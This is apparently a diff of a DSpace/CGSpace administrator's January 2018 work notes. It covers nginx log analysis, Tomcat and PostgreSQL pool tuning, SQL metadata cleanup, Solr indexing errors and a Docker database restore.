f.query.encapsulator=%22&f.workflowStep.split=true&f.workflowStep.separator=%7C&f.workflowStep.encapsulator=%22&f.containerCollection.split=true&f.containerCollection.separator=%7C&f.containerCollection.encapsulator=%22&f.complete_query_search.split=true&f.complete_query_search.separator=%7C&f.complete_query_search.encapsulator=%22&f.p_communities_id.split=true&f.p_communities_id.separator=%7C&f.p_communities_id.encapsulator=%22&f.rangeDescription.split=true&f.rangeDescription.separator=%7C&f.rangeDescription.encapsulator=%22&f.group_id.split=true&f.group_id.separator=%7C&f.group_id.encapsulator=%22&f.bundleName.split=true&f.bundleName.separator=%7C&f.bundleName.encapsulator=%22&f.ngram_simplequery_search.split=true&f.ngram_simplequery_search.separator=%7C&f.ngram_simplequery_search.encapsulator=%22&f.group_map.split=true&f.group_map.separator=%7C&f.group_map.encapsulator=%22&f.owningColl.split=true&f.owningColl.separator=%7C&f.owningColl.encapsulator=%22&f.p_group_id.split=true&f.p_group_id.separator=%7C&f.p_group_id.encapsulator=%22&f.p_group_name.split=true&f.p_group_name.separator=%7C&f.p_group_name.encapsulator=%22&wt=javabin&version=2 HTTP/1.1" 409 156
     
    • The new core is created but when DSpace attempts to POST to it there is an HTTP 409 error
    • This is apparently a common Solr error code that means “version conflict”: http://yonik.com/solr/optimistic-concurrency/
    • Looks like that bot from the PerfectIP.net host ended up making about 450,000 requests to XMLUI alone yesterday:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" | grep "10/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
       21572 70.36.107.50
       30722 70.36.107.190
       34566 70.36.107.49
    @@ -659,18 +659,18 @@ cache_alignment : 64
     
    • Wow, I just figured out how to set the application name of each database pool in the JNDI config of Tomcat’s server.xml:
    -
    <Resource name="jdbc/dspaceWeb" auth="Container" type="javax.sql.DataSource"
    -          driverClassName="org.postgresql.Driver"
    -          url="jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb"
    -          username="dspace"
    -          password="dspace"
    -          initialSize='5'
    -          maxActive='75'
    -          maxIdle='15'
    -          minIdle='5'
    -          maxWait='5000'
    -          validationQuery='SELECT 1'
    -          testOnBorrow='true' />
    +
    <Resource name="jdbc/dspaceWeb" auth="Container" type="javax.sql.DataSource"
    +          driverClassName="org.postgresql.Driver"
    +          url="jdbc:postgresql://localhost:5432/dspacetest?ApplicationName=dspaceWeb"
    +          username="dspace"
    +          password="dspace"
    +          initialSize='5'
    +          maxActive='75'
    +          maxIdle='15'
    +          minIdle='5'
    +          maxWait='5000'
    +          validationQuery='SELECT 1'
    +          testOnBorrow='true' />
     
    • So theoretically I could name each connection “xmlui” or “dspaceWeb” or something meaningful and it would show up in PostgreSQL’s pg_stat_activity table!
    • This would be super helpful for figuring out where load was coming from (now I wonder if I could figure out how to graph this)
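Once each pool sets `ApplicationName`, the name appears in the `application_name` column of `pg_stat_activity`, so connections can be tallied per application. A minimal sketch, assuming the rows were fetched elsewhere as dictionaries with `application_name` and `state` keys (for example from `SELECT application_name, state FROM pg_stat_activity`); `connections_by_application` is a hypothetical helper name:

```python
from collections import Counter


def connections_by_application(rows):
    """Tally (application_name, state) pairs from pg_stat_activity rows."""
    return Counter(
        # Connections that did not set a name report an empty string
        (row["application_name"] or "(unnamed)", row["state"])
        for row in rows
    )
```

Sampling a tally like this at regular intervals would give the per-application series needed to graph where the load comes from.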
    • @@ -686,16 +686,16 @@ cache_alignment : 64
    • I’m looking at the DSpace 6.0 Install docs and notice they tweak the number of threads in their Tomcat connector:
    <!-- Define a non-SSL HTTP/1.1 Connector on port 8080 -->
    -<Connector port="8080"
    -           maxThreads="150"
    -           minSpareThreads="25"
    -           maxSpareThreads="75"
    -           enableLookups="false"
    -           redirectPort="8443"
    -           acceptCount="100"
    -           connectionTimeout="20000"
    -           disableUploadTimeout="true"
    -           URIEncoding="UTF-8"/>
    +<Connector port="8080"
    +           maxThreads="150"
    +           minSpareThreads="25"
    +           maxSpareThreads="75"
    +           enableLookups="false"
    +           redirectPort="8443"
    +           acceptCount="100"
    +           connectionTimeout="20000"
    +           disableUploadTimeout="true"
    +           URIEncoding="UTF-8"/>
     
    • In Tomcat 8.5 the maxThreads defaults to 200 which is probably fine, but tweaking minSpareThreads could be good
    • I don’t see a setting for maxSpareThreads in the docs so that might be an error
    • @@ -711,8 +711,8 @@ cache_alignment : 64
    • Still testing DSpace 6.2 on Tomcat 8.5.24
    • Catalina errors at Tomcat 8.5 startup:
    -
    13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of "35" for "maxActive" property, which is being ignored.
    -13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of "5000" for "maxWait" property, which is being ignored.
    +
    13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxActive is not used in DBCP2, use maxTotal instead. maxTotal default value is 8. You have set value of "35" for "maxActive" property, which is being ignored.
    +13-Jan-2018 13:59:05.245 WARNING [main] org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory.getObjectInstance Name = dspace6 Property maxWait is not used in DBCP2 , use maxWaitMillis instead. maxWaitMillis default value is -1. You have set value of "5000" for "maxWait" property, which is being ignored.
     
    • I looked in my Tomcat 7.0.82 logs and I don’t see anything about DBCP2 errors, so I guess this is a Tomcat 8.0.x or 8.5.x thing
    • DBCP2 appears to be Tomcat 8.0.x and up according to the Tomcat 8.0 migration guide
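The two warnings above amount to a rename of pool attributes. A small sketch of that mapping, covering only the two properties named in the log (any other DBCP2 renames are out of scope here, and the helper name is my own):

```python
# Renames taken from the two Tomcat 8.5 warnings above; nothing else is assumed.
DBCP2_RENAMES = {
    "maxActive": "maxTotal",
    "maxWait": "maxWaitMillis",
}


def migrate_pool_attributes(attrs: dict) -> dict:
    """Return a copy of the pool attributes with DBCP1 names replaced by DBCP2 names."""
    return {DBCP2_RENAMES.get(name, name): value for name, value in attrs.items()}


old = {"maxActive": "35", "maxWait": "5000", "maxIdle": "15"}
print(migrate_pool_attributes(old))
```

Attributes that are not in the mapping pass through unchanged, so the same function can be run over a whole `<Resource>` attribute set.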
    • @@ -761,15 +761,15 @@ Caused by: java.lang.NullPointerException
    • Help Udana from IWMI export a CSV from DSpace Test so he can start trying a batch upload
    • I’m going to apply these ~130 corrections on CGSpace:
    -
    update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
    -update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
    -update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
    -update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
    -update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
    -update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
    -update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
    +
    update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
    +update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
    +update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
    +update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
    +update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
    +update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
    +update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
     
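One caveat with the `~` patterns above: PostgreSQL's `~` operator is a case-sensitive regular expression match that succeeds anywhere in the value, so `'(En|English)'` would also match a longer value that merely contains `En`. A sketch of the difference in Python, where `re.search` stands in for the unanchored match and `re.fullmatch` for an anchored pattern such as `'^(En|English)$'`. The value `Environmental` is a made-up example, not something found in the data:

```python
import re


def matches_unanchored(pattern: str, value: str) -> bool:
    # Comparable to "text_value ~ pattern": a match anywhere in the value counts.
    return re.search(pattern, value) is not None


def matches_anchored(pattern: str, value: str) -> bool:
    # Comparable to "text_value ~ '^pattern$'": the whole value must match.
    return re.fullmatch(pattern, value) is not None


for value in ["En", "English", "Environmental"]:
    print(value, matches_unanchored("(En|English)", value), matches_anchored("(En|English)", value))
```

For language fields with short, well-known values the unanchored form is probably harmless, but anchoring is cheap insurance before running an update on production.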
    • Continue proofing Peter’s author corrections that I started yesterday, faceting on non-blank, non-flagged values and briefly scrolling through the corrections to find encoding errors in French and Spanish names
    @@ -777,17 +777,17 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and -
    $ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-01-14-Authors-1300-Corrections.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
     
    • In looking at some of the values to delete or check I found some metadata values whose handles I could not resolve via SQL:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Tarawali';
      metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
     -------------------+-------------+-------------------+------------+-----------+-------+-----------+------------+------------------
                2757936 |        4369 |                 3 | Tarawali   |           |     9 |           |        600 |                2
     (1 row)
     
    -dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
    +dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '4369';
      handle
     --------
     (0 rows)
    @@ -796,7 +796,7 @@ dspace=# select handle from item, handle where handle.resource_id = item.item_id
     
  • Otherwise, the DSpace 5 SQL Helper Functions provide ds5_item2itemhandle(), which is much easier than my long query above that I always have to go search for
  • For example, to find the Handle for an item that has the author “Erni”:
  • -
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='Erni';
      metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place |              authority               | confidence | resource_type_id 
     -------------------+-------------+-------------------+------------+-----------+-------+--------------------------------------+------------+------------------
                2612150 |       70308 |                 3 | Erni       |           |     9 | 3fe10c68-6773-49a7-89cc-63eb508723f2 |         -1 |                2
    @@ -809,16 +809,16 @@ dspace=# select ds5_item2itemhandle(70308);
     
    • Next I apply the author deletions:
    -
    $ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
    +
    $ ./delete-metadata-values.py -i /tmp/2018-01-14-Authors-5-Deletions.csv -f dc.contributor.author -m 3 -d dspace -u dspace -p 'fuuu'
     
    • Now working on the affiliation corrections from Peter:
    -
    $ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    -$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
    +
    $ ./fix-metadata-values.py -i /tmp/2018-01-15-Affiliations-888-Corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p 'fuuu'
    +$ ./delete-metadata-values.py -i /tmp/2018-01-15-Affiliations-11-Deletions.csv -f cg.contributor.affiliation -m 211 -d dspace -u dspace -p 'fuuu'
     
    • Now I made a new list of affiliations for Peter to look through:
    -
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where metadata_schema_id = 2 and element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
     COPY 4552
     
    • Looking over the affiliations again I see dozens of CIAT ones with their affiliation formatted like: International Center for Tropical Agriculture (CIAT)
    • @@ -832,7 +832,7 @@ COPY 4552
    • Looks like we processed 2.9 million requests on CGSpace in 2017-12:
    -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Dec/2017"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Dec/2017"
     2890041
     
     real    0m25.756s
    @@ -845,7 +845,7 @@ sys     0m2.210s
     
  • Discuss standardized names for CRPs and centers with ICARDA (don’t wait for CG Core)
  • Re-send DC rights implementation and forward to everyone so we can move forward with it (without the URI field for now)
  • Start looking at where I was with the AGROVOC API
  • -
  • Have a controlled vocabulary for CGIAR authors' names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)
  • +
  • Have a controlled vocabulary for CGIAR authors’ names and ORCIDs? Perhaps values like: Orth, Alan S. (0000-0002-1735-7458)
  • Need to find the metadata field name that ICARDA is using for their ORCIDs
  • Update text for DSpace version plan on wiki
  • Come up with an SLA, something like: In return for your contribution we will, to the best of our ability, ensure 99.5% (“two and a half nines”) uptime of CGSpace, ensure data is stored in open formats and safely backed up, follow CG Core metadata standards, …
  • @@ -864,14 +864,14 @@ sys 0m2.210s
  • Also, there are whitespace issues in many columns, and the items are mapped to the LIVES and ILRI articles collections, not Theses
  • In any case, importing them like this:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFormat -m lives.map &> lives.log
     
    • And fantastic, before I started the import there were 10 PostgreSQL connections, and then CGSpace crashed during the upload
    • When I looked there were 210 PostgreSQL connections!
    • I don’t see any high load in XMLUI or REST/OAI:
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
         381 40.77.167.124
         403 213.55.99.121
         431 207.46.13.60
    @@ -882,7 +882,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
         593 54.91.48.104
         757 104.196.152.243
         776 66.249.66.90
    -# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
    +# cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "17/Jan/2018" | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
          11 205.201.132.14
          11 40.77.167.124
          15 35.226.23.240
    @@ -906,7 +906,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /tmp/2018-01-16\ LIVES/SimpleArchiveFor
     [====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 45 seconds. timestamp: 2018-01-17 07:57:11
     [====================>                              ]40% time remaining: 7 hour(s) 14 minute(s) 44 seconds. timestamp: 2018-01-17 07:57:37
     [====================>                              ]40% time remaining: 7 hour(s) 16 minute(s) 5 seconds. timestamp: 2018-01-17 07:57:49
    -Exception in thread "http-bio-127.0.0.1-8081-exec-627" java.lang.OutOfMemoryError: Java heap space
    +Exception in thread "http-bio-127.0.0.1-8081-exec-627" java.lang.OutOfMemoryError: Java heap space
             at org.apache.lucene.util.FixedBitSet.clone(FixedBitSet.java:576)
             at org.apache.solr.search.BitDocSet.andNot(BitDocSet.java:222)
             at org.apache.solr.search.SolrIndexSearcher.getProcessedFilter(SolrIndexSearcher.java:1067)
    @@ -1004,7 +1004,7 @@ $ docker run --network dspace-build --name artifactory -d -v artifactory5_data:/
     
  • I don’t see any errors in the nginx or catalina logs, so I guess UptimeRobot just got impatient and closed the request, which caused nginx to send an HTTP 499
  • I realize I never did a full re-index after the SQL author and affiliation updates last week, so I should force one now:
  • -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
     
    • Maria from Bioversity asked if I could remove the abstracts from all of their Limited Access items in the Bioversity Journal Articles collection
    • @@ -1026,7 +1026,7 @@ Jan 18 07:01:22 linode18 sudo[10812]: pam_unix(sudo:session): session opened for
    • Linode alerted and said that the CPU load was 264.1% on CGSpace
    • Start the Discovery indexing again:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
     $ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace index-discovery -b
     
    • Linode alerted again and said that CGSpace was using 301% CPU
    • @@ -1073,10 +1073,10 @@ sys 0m12.317s
    $ docker exec dspace_db dropdb -U postgres dspace
     $ docker exec dspace_db createdb -U postgres -O dspace --encoding=UNICODE dspace
    -$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
    +$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace createuser;'
     $ docker cp test.dump dspace_db:/tmp/test.dump
     $ docker exec dspace_db pg_restore -U postgres -d dspace /tmp/test.dump
    -$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
    +$ docker exec dspace_db psql -U postgres dspace -c 'alter user dspace nocreateuser;'
     $ docker exec dspace_db vacuumdb -U postgres dspace
     $ docker cp ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace_db:/tmp
     $ docker exec dspace_db psql -U dspace -f /tmp/update-sequences.sql dspace
    @@ -1119,12 +1119,12 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
  • Thinking about generating a jmeter test plan for DSpace, along the lines of Georgetown’s dspace-performance-test
  • I got a list of all the GET requests on CGSpace for January 21st (the last time Linode complained the load was high), excluding admin calls:
  • -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -c -v "/admin"
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -c -v "/admin"
     56405
     
    • Apparently about 28% of these requests were for bitstreams, 30% for the REST API, and 30% for handles:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo "^/(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo "^/(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
          38 /oai/
       14406 /bitstream/
       15179 /rest/
    @@ -1132,14 +1132,14 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
    • And 3% were to the homepage or search:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -Eo '^/($|open-search|discover)' | sort | uniq -c
        1050 /
         413 /discover
         170 /open-search
     
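The grep pipelines above bucket request paths by their leading component. A rough Python equivalent, assuming the request paths have already been extracted (field 7 of each log line, as in the `awk '{print $7}'` step). The function names and the sample paths are invented for illustration:

```python
import re
from collections import Counter

# Same prefixes as the grep -Eo pattern used above
PREFIX = re.compile(r"^/(handle|bitstream|rest|oai)/")


def bucket_paths(paths):
    """Count request paths by leading prefix; anything else lands in 'other'."""
    counts = Counter()
    for path in paths:
        match = PREFIX.match(path)
        counts[match.group(0) if match else "other"] += 1
    return counts


def shares(counts):
    """Convert raw counts to percentages of the total, rounded to one decimal."""
    total = sum(counts.values())
    if not total:
        return {}
    return {key: round(100 * value / total, 1) for key, value in counts.items()}


# Invented sample paths, not taken from the real logs
paths = ["/handle/10568/1", "/rest/items", "/bitstream/handle/x.pdf", "/", "/rest/collections"]
print(shares(bucket_paths(paths)))
```

Doing the bucketing in one pass avoids re-reading all the compressed logs for every category.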
    • The last 10% or so seem to be for static assets that would be served by nginx anyways:
    -
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz /var/log/nginx/library-access.log.2.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/rest.log.2.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/oai.log.2.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/error.log.2.gz /var/log/nginx/error.log.3.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -v bitstream | grep -Eo '\.(js|css|png|jpg|jpeg|php|svg|gif|txt|map)$' | sort | uniq -c | sort -n
           2 .gif
           7 .css
          84 .js
    @@ -1153,7 +1153,7 @@ $ ./rest-find-collections.py 10568/1 | grep -i untitled
     
    • Looking at the REST requests, most of them are to expand all or metadata, but 5% are for retrieving bitstreams:
    -
    # zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -E "^/rest" | grep -Eo "(retrieve|expand=[a-z].*)" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz /var/log/nginx/library-access.log.3.gz /var/log/nginx/library-access.log.4.gz /var/log/nginx/rest.log.3.gz /var/log/nginx/rest.log.4.gz /var/log/nginx/oai.log.3.gz /var/log/nginx/oai.log.4.gz /var/log/nginx/error.log.3.gz /var/log/nginx/error.log.4.gz | grep "21/Jan/2018" | grep "GET " | grep -v "/admin" | awk '{print $7}' | grep -E "^/rest" | grep -Eo "(retrieve|expand=[a-z].*)" | sort | uniq -c | sort -n
           1 expand=collections
          16 expand=all&limit=1
          45 expand=items
    @@ -1268,15 +1268,15 @@ $ ./jmeter -n -t ~/dspace-performance-test/DSpacePerfTest-dspacetest.cgiar.org.j
     
  • Looking at the DSpace logs I see this error happened just before UptimeRobot noticed it going down:
  • 2018-01-29 05:30:22,226 INFO  org.dspace.usage.LoggerUsageEventListener @ anonymous:session_id=3775D4125D28EF0C691B08345D905141:ip_addr=68.180.229.254:view_item:handle=10568/71890
    -2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
    +2018-01-29 05:30:22,322 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractSearch @ org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
     Was expecting one of:
    -    "TO" ...
    +    "TO" ...
         <RANGE_QUOTED> ...
         <RANGE_GOOP> ...
         
    -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
    +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1994+TO+1999]': Encountered " "]" "] "" at line 1, column 32.
     Was expecting one of:
    -    "TO" ...
    +    "TO" ...
         <RANGE_QUOTED> ...
         <RANGE_GOOP> ...
     
      @@ -1284,12 +1284,12 @@ Was expecting one of:
    • I see a few dozen HTTP 499 errors in the nginx access log for a few minutes before this happened, but HTTP 499 is just when nginx says that the client closed the request early
    • Perhaps this from the nginx error log is relevant?
    -
    2018/01/29 05:26:34 [warn] 26895#26895: *944759 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000026166 while reading upstream, client: 180.76.15.34, server: cgspace.cgiar.org, request: "GET /bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12 HTTP/1.1", upstream: "http://127.0.0.1:8443/bitstream/handle/10947/4658/FISH%20Leaflet.pdf?sequence=12", host: "cgspace.cgiar.org"
    +
